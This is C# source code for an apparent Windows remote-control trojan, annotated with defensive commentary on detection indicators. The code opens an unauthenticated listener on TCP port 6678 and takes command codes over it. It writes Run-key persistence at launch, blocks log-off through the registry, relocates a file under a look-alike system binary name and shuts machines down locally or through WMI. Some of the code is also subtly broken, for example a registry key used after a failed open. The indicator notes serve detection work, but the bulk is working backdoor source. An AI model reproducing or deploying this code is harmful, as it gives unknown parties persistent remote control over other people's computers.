/// <summary>
/// Remote-control listener exactly as it appears on this page: it binds a TCP listener on
/// port 6678, reads 6-byte ASCII command codes from whoever connects, and dispatches them to
/// local actions (registry edits, autorun registration, shutdown). There is no
/// authentication, no origin check and no integrity check on the command stream, so any peer
/// that can reach the port can drive every branch below.
/// From a defensive standpoint the observable indicators are all in this file: an unexpected
/// listening socket on TCP/6678, a new value under the CurrentVersion Run key opened below
/// (named after the running executable), cmd.exe spawned with "shutdown -s -t 0", and the
/// fixed reply strings "hjc", "hkz" and "ext". All comments were translated from Chinese;
/// commented-out statements are kept as the author left them.
/// </summary>
public class MMListenerClass
{
    // Shared across threads without synchronisation: Execute() assigns listener,
    // reControlCode() assigns socket, and the "exit11"/"close1" cases clear IsRunning.
    private static TcpListener listener = null;
    private static bool IsRunning = false;
    private static Socket socket = null;

    /// <summary>
    /// Starts the listener on port 6678, spawns the command-receiving thread and
    /// immediately registers this executable for autorun via <see cref="AutoSetupRun"/>.
    /// Called from the Form1 constructor, i.e. before the window is ever shown.
    /// </summary>
    public static void Execute()
    {
        //1 hide itself
        //Console.SetWindowSize(0, 0);
        //Console.SetWindowPosition(0, 0);
        //Console.WriteLine("正在侦听本机6678端口...");
        //2 receiving the control codes
        //add your listening code here
        //the port can be chosen freely; a fixed port is used here
        int port = 6678;
        // System.Net.Sockets.TcpListener listens for TCP clients.
        // This overload binds to every local interface, so the port is reachable
        // from the network, not just from localhost -- a host-firewall rule or a
        // netstat/"listening port" inventory is the simplest way to spot it.
        listener = new TcpListener(port);
        //start listening
        listener.Start();
        //start the thread that receives control codes; Thread.Abort() could stop it
        //reControlCode is the thread entry point; it picks the matching
        //action for each control code it receives
        IsRunning = true;
        Thread thread = new Thread(new ThreadStart(reControlCode));
        thread.Start();
        AutoSetupRun();
        //the code below does not work: each socket address may only be used once
        //string hostName = LocalHostName;
        //string ipStr = GetIPByHostName(hostName);
        //IPEndPoint ipPoint = new IPEndPoint(IPAddress.Parse(ipStr), port);
        //listener = new TcpListener(ipPoint);
    }

    //the reControlCode function follows; see the program for the full code
    /// <summary>
    /// Accept loop: blocks on AcceptSocket, then for each connection reads fixed 6-byte
    /// commands and dispatches them via the switch below. Every reply is sent with
    /// <see cref="RetMessage"/>. Any exception inside a connection is swallowed by the
    /// outer catch and the loop simply accepts the next client, so a malformed peer cannot
    /// stop the listener -- only the "exit11"/"close1" codes do.
    /// </summary>
    private static void reControlCode()
    {
        int socketHandle = -1;
        while (IsRunning == true)
        {
            //AcceptSocket blocks until a client connects and returns the accepted socket
            socket = listener.AcceptSocket();
            try
            {
                socketHandle = socket.Handle.ToInt32();
                //Console.WriteLine("socket已处于连接状态" + socket.Handle.ToInt32().ToString());
                //runs while the connection is up
                while (socket != null && socket.Connected == true)
                {
                    //receive the control code
                    byte[] by = new byte[6];
                    // The number of bytes actually received (i) is never consulted;
                    // the whole 6-byte buffer is decoded regardless of how much arrived.
                    int i = socket.Receive(by, by.Length, 0);
                    string ss = System.Text.Encoding.ASCII.GetString(by);
                    ss = ss.Trim();
                    //execute a different action depending on the control code
                    //(registry modification, etc.)
                    //Console.WriteLine("接收到控制码:" + ss);
                    if (ss == "/0/0/0/0/0/0") break;
                    if (ss.Trim() == "") break;
                    // Command protocol: every code is exactly 6 ASCII characters.
                    // Unknown codes fall through to default and are still acknowledged
                    // with "hkz", so a scanner probing the port gets a deterministic
                    // banner-like reply -- a usable network signature.
                    switch (ss) //ss must be exactly 6 characters long here
                    {
                        case "jiance"://connection test, returns a test message
                            RetMessage(ss, "hjc");
                            break;
                        case "zx1000":
                            //registry-modifying function, self-defined, see the analysis below
                            //UnLogOff();
                            //return a control message
                            RetMessage(ss, "hkz");
                            break;
                        case "zx0100":
                            //registry-modifying function
                            //UnClose();
                            //return a control message
                            RetMessage(ss, "hkz");
                            break;
                        case "zhucex":
                            RetMessage(ss, "hkz");
                            break;
                        case "zhuces":
                            RetMessage(ss, "hkz");
                            break;
                        case "warring":
                            RetMessage(ss, "hkz");
                            break;
                        case "suggest":
                            RetMessage(ss, "hkz");
                            break;
                        case "mumawe":
                            RetMessage(ss, "hkz");
                            break;
                        case "clear1":
                            Console.Clear();
                            RetMessage(ss, "hkz");
                            break;
                        case "drop11":
                            RetMessage(ss, "hkz");
                            break;
                        case "exit11":
                            // Stops the accept loop, tears down the connection and exits
                            // the whole application.
                            IsRunning = false;
                            socket.Shutdown(SocketShutdown.Both);
                            socket.Close();
                            socket = null;
                            Application.Exit();
                            RetMessage(ss, "ext");
                            break;
                        case "close1":
                            // Identical to "exit11".
                            IsRunning = false;
                            socket.Shutdown(SocketShutdown.Both);
                            socket.Close();
                            socket = null;
                            Application.Exit();
                            RetMessage(ss, "ext");
                            break;
                        case "autoru":
                            // Re-registers the running executable under the Run key.
                            AutoSetupRun();
                            RetMessage(ss, "hkz");
                            break;
                        case "logout":
                            // ExitWindowClass is defined elsewhere in the project.
                            ExitWindowClass.logout();
                            RetMessage(ss, "hkz");
                            break;
                        case "shdown":
                            //shut down the machine (local shutdown, see Shutdown())
                            Shutdown();
                            RetMessage(ss, "hkz");
                            break;
                        //duplicate cases behave like the ones above and are omitted
                        default:
                            RetMessage(ss, "hkz");
                            break;
                    }//switch
                    Thread.Sleep(100);
                }//while
            }
            catch (Exception ee)
            {
                // Deliberately silent: a failed Receive/Send just ends this
                // connection and the outer loop accepts the next one.
                //Console.WriteLine(ee.Message);
            }
        }
    } //private void reControlCode

    /// <summary>
    /// Sends the fixed ASCII reply <paramref name="str"/> back over the current socket.
    /// <paramref name="ss"/> (the command being acknowledged) is only used in the
    /// commented-out trace line. Does nothing when no socket is connected.
    /// </summary>
    private static void RetMessage(string ss, string str)
    {
        if (socket != null)
        {
            byte[] bytee = System.Text.Encoding.ASCII.GetBytes(str);
            socket.Send(bytee, 0, bytee.Length, 0);
            //Console.WriteLine("已回发信息给控制码:" + ss + "为" + str);
        }
    }

    //3 modifying the registry
    //setting the value NoLogOff to 1 below prevents the machine from logging off.
    //The function below performs the registry change in C#:
    /// <summary>
    /// Writes NoLogOff = 1 under the Policies\Explorer key named below (HKLM). Per the
    /// author's own comment this blocks interactive log-off. Both attempts are wrapped in
    /// empty catch blocks, so a failure (e.g. no write access to HKLM) is silent.
    /// <c>mystr</c> is assembled but never used or shown. This is an instance method that is
    /// only referenced from the commented-out "zx1000" branch, so it is not reachable from
    /// the static dispatch as written. Defensively, a change to this policy value is a
    /// good registry-audit / Sysmon event-13 candidate.
    /// </summary>
    private void UnLogOff()
    {
        //get the top-level registry node for the local machine
        Microsoft.Win32.RegistryKey rLocal = Registry.LocalMachine;
        //variable for the registry subkey
        RegistryKey key1 = null;
        string mystr = "";
        try
        {
            //RegistryKey.OpenSubKey(string registrykey, bool canwrite) retrieves the given subkey;
            //registrykey is the key name, canwrite=true allows modification (default false)
            key1 = rLocal.OpenSubKey("SOFTWARE//Microsoft//Windows//CurrentVersion//Policies//Explorer", true);
            //set the value name and data
            key1.SetValue("NoLogOff", 1);
            //close the opened subkey
            key1.Close();
            //build the warning string
            mystr = mystr + "HKEY_LOCAL_MACHINE//SOFTWARE//Microsoft//Windows//CurrentVersion//Policies//Explorer键值Nologoff被修改!请将它置为0!";
        }
        catch { }
        //if the key does not exist, create it
        if (key1 == null)
        {
            try
            {
                //RegistryKey.CreateSubKey(string) creates the required subkey
                RegistryKey key2 = rLocal.CreateSubKey("SOFTWARE//Microsoft//Windows//CurrentVersion//Policies//Explorer");
                key2.SetValue("NoLogOff", 1);
                key2.Close();
                mystr = mystr +
                    "HKEY_LOCAL_MACHINE//SOFTWARE//Microsoft//Windows//CurrentVersion//Policies//Explorer键值Nologoff被修改!请将它置为0!";
            }
            catch { }
        }
    }

    //4 self-copy and relocation
    /// <summary>
    /// Moves a hard-coded file to a second hard-coded path (a look-alike of a system
    /// binary name) and registers that path under the Run key with the value name
    /// "microsoftt". Not called anywhere in this file. Every step is wrapped in an empty
    /// catch, so nothing is reported on failure. Look-alike file names under system
    /// directories plus a Run value pointing at them are the indicators to hunt for.
    /// </summary>
    private void moveCC1()
    {
        //get the top-level registry node for the local machine
        Microsoft.Win32.RegistryKey rLocal = Registry.LocalMachine;
        RegistryKey key1 = null;
        try
        {
            //File.Move(string sourceFileName, string destFileName) moves a file;
            //sourceFileName is the file to move, destFileName its new path
            string sfn = "C://winnnt//system//msdoss.exe";
            string dfn = "d://winnt//system32//expleror.exe";
            File.Move(sfn, dfn);
            if (Directory.Exists("C://WINDOWS//system32") == true)
            {
                File.Move(sfn, dfn);
            }
        }
        catch { }
        //register the relocated program for autostart; same analysis as above
        try
        {
            key1 = rLocal.OpenSubKey("SOFTWARE//Microsoft//Windows//CurrentVersion//Run", true);
            key1.SetValue("microsoftt", "d://winnt//system32//expleror.exe");
            key1.Close();
        }
        catch { }
        if (key1 == null)
        {
            try
            {
                RegistryKey key2 = rLocal.CreateSubKey("SOFTWARE//Microsoft//Windows//CurrentVersion//Run");
                key1.SetValue("microsoftt", "d://winnt//system32//expleror.exe");
                key1.Close();
            }
            catch { }
        }
    } //moveCC1()

    //automatic installation / autorun
    /// <summary>
    /// Persistence: writes the path of the currently running executable under the HKLM
    /// Run key opened below, using the executable's own file name as the value name.
    /// Called once from <see cref="Execute"/> and again on every "autoru" command.
    /// Inner failures are swallowed; only an exception outside the inner try blocks is
    /// printed. A new Run value whose data equals the writing process's own image path
    /// is a high-signal detection rule for this behaviour.
    /// </summary>
    private static void AutoSetupRun()
    {
        try
        {
            string exefilepath = Application.ExecutablePath;
            //Console.WriteLine(exefilepath);
            string exefilename = System.IO.Path.GetFileNameWithoutExtension(exefilepath);
            Microsoft.Win32.RegistryKey rLocal = Registry.LocalMachine;
            RegistryKey key1 = null;
            try
            {
                key1 = rLocal.OpenSubKey("SOFTWARE//Microsoft//Windows//CurrentVersion//Run", true);
                key1.SetValue(exefilename, exefilepath);
                key1.Close();
            }
            catch { }
            if (key1 == null)
            {
                try
                {
                    RegistryKey key2 = rLocal.CreateSubKey("SOFTWARE//Microsoft//Windows//CurrentVersion//Run");
                    key1.SetValue(exefilename, exefilepath);
                    key1.Close();
                }
                catch { }
            }
        }
        catch (Exception ee)
        {
            Console.WriteLine(ee.Message);
        }
    }

    //shut down a remote computer
    /// <summary>
    /// Connects to the WMI namespace of <paramref name="server"/> with the supplied
    /// credentials and invokes Win32_OperatingSystem.Shutdown there. Credentials are
    /// passed as plain strings. Not referenced from the command dispatch in this file
    /// ("shdown" calls the local <see cref="Shutdown"/>). A remote WMI shutdown shows up
    /// as a WMI-Activity / remote logon event on the target.
    /// </summary>
    private static void RemoteShutdown(string server, string userName, string password)
    {
        //options for connecting to the remote computer
        ConnectionOptions options = new ConnectionOptions();
        options.Username = userName;
        options.Password = password;
        ManagementScope scope = new
            ManagementScope("////" + server + "//root//cimv2", options);
        try
        {
            //connect to the remote computer with the given administrator name and password
            scope.Connect();
            System.Management.ObjectQuery oq = new System.Management.ObjectQuery("SELECT * FROM Win32_OperatingSystem");
            ManagementObjectSearcher query1 = new ManagementObjectSearcher(scope, oq);
            //obtain the WMI objects
            ManagementObjectCollection queryCollection1 = query1.Get();
            foreach (ManagementObject mo in queryCollection1)
            {
                string[] ss = { "" };
                //shut down the remote computer
                mo.InvokeMethod("Shutdown", ss);
            }
        }
        //report errors
        catch (Exception ee)
        {
            Console.WriteLine("连接出错,出错信息为:" + ee.Message);
        }
    }

    /// <summary>
    /// Local shutdown: starts a hidden cmd.exe and pipes "shutdown -s -t 0" plus "exit" to
    /// its stdin, then calls ExitWindowClass.DoExitWinShutDown() (defined elsewhere).
    /// Process-creation logging (cmd.exe as a child of this process, followed by
    /// shutdown.exe) is the natural detection point.
    /// </summary>
    private static void Shutdown()
    {
        Console.WriteLine("正在关闭本计算机...");
        Process p = new Process();
        p.StartInfo.FileName = "cmd.exe";
        p.StartInfo.UseShellExecute = false;
        p.StartInfo.RedirectStandardInput = true;
        p.StartInfo.RedirectStandardOutput = true;
        p.StartInfo.CreateNoWindow = true;
        p.Start();
        p.StandardInput.WriteLine("shutdown -s -t 0");
        p.StandardInput.WriteLine("exit");
        p.Close();
        ExitWindowClass.DoExitWinShutDown();
    }

    //host information helpers
    /// <summary>
    /// Resolves <paramref name="hostName"/> via DNS and returns every address as a string.
    /// Only referenced from commented-out code in <see cref="Execute"/>.
    /// </summary>
    private static string[] GetIPArrayByHostName(string hostName)
    {
        IPHostEntry ipEntry = Dns.GetHostEntry(hostName);
        IPAddress[] IpAddr = ipEntry.AddressList;
        string[] strAddr = new string[IpAddr.Length];
        for (int i = 0; i < IpAddr.Length; i++)
        {
            strAddr[i] = IpAddr[i].ToString();
        }
        return strAddr;
    }

    /// <summary>
    /// Resolves <paramref name="hostName"/> and returns the first address, or "" when
    /// the address list is empty. Only referenced from commented-out code.
    /// </summary>
    private static string GetIPByHostName(string hostName)
    {
        string strAddr = "";
        IPHostEntry ipEntry = Dns.GetHostEntry(hostName);
        IPAddress[] IpAddr = ipEntry.AddressList;
        if (IpAddr != null && IpAddr.Length >= 1)
        {
            strAddr = IpAddr[0].ToString();
        }
        return strAddr;
    }

    /// <summary>Local machine's host name as reported by Dns.GetHostName().</summary>
    private static string LocalHostName
    {
        get { return Dns.GetHostName(); }
    }
}
/// <summary>
/// WinForms host for the listener above. Note that the listener is started from the
/// <see cref="Form1"/> constructor, so the TCP port is open and the autorun entry is written
/// before Application.Run ever shows a window.
/// </summary>
static class Program
{
    /// <summary>
    /// The main entry point for the application.
    /// </summary>
    [STAThread]
    static void Main()
    {
        Application.EnableVisualStyles();
        Application.SetCompatibleTextRenderingDefault(false);
        Application.Run(new Form1());
    }
}

/// <summary>
/// Main form. Its only non-designer work is to kick off
/// <see cref="MMListenerClass.Execute"/> during construction; InitializeComponent is the
/// designer-generated half of this partial class and is not on this page.
/// </summary>
public partial class Form1 : Form
{
    public Form1()
    {
        InitializeComponent();
        // Side effects here: binds TCP/6678, starts the accept thread and writes the
        // Run-key persistence entry -- all before the form is visible.
        MMListenerClass.Execute();
    }
}